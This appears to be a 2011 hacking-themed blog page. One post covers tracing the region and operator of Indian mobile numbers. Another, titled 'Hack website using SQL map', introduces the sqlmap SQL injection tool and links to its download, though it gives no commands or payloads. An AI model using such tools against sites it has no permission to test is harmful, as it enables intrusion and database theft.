Or use the download link below to download the oflline installer directly
Download Bitdefender 2012 total security offline installer

Monday 2 May 2011

How to Trace Mobile Numbers

With the rapid growth of mobile phone usage in recent years, we have often observed that the mobile phone has become a part of many illegal and criminal activities. So in most cases, tracing the mobile number becomes a vital part of the investigation process. Also sometimes we just want to trace a mobile number for reasons like annoying prank calls, blackmails, unknown number in a missed call list or similar.
Even though it is not possible to trace the number back to the caller, it is possible to trace it to the location of the caller and also find the network operator. Just have a look at this page on tracing Indian mobile numbers from Wikipedia. Using the information provided on this page, it is possible to certainly trace any mobile number from India and find out the location (state/city) and network operator (mobile operator) of the caller. All you need for this is only the first 4-digit of the mobile number. In this Wiki page you will find all the mobile number series listed in a nice tabular column where they are categorized based on mobile operator and the zone (state/city). This Wiki page is updated regularly so as to provide up-to-date information on newly added mobile number series and operators. I have used this page many a time and have never been disappointed.
If you would like to use a simpler interface where in you can just enter the target mobile number and trace the desired details, you can try this link from Numbering Plans. Using this link, you can trace any number in the world.
By using the information in this article, you can only know “where” the call is from and not “who” the caller is. Only the mobile operator is able to tell you ”who” the caller is. So if you’re in an emergency and need to find out the actual person behind the call, I would recommend that you file a complaint and take the help of police. I hope this information has helped you!

Sunday 1 May 2011

Hack website using SQL map | automatic SQL injection tool

Today i am going to write a sql injection tool. It's V 0.9 is just released. There are many changes in this tool from it's previous version. Sql injection is one of the top web application vulnerabilities. It's very important to check a website against this vulnerability.  


sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


Download Here:
http://sourceforge.net/projects/sqlmap/files/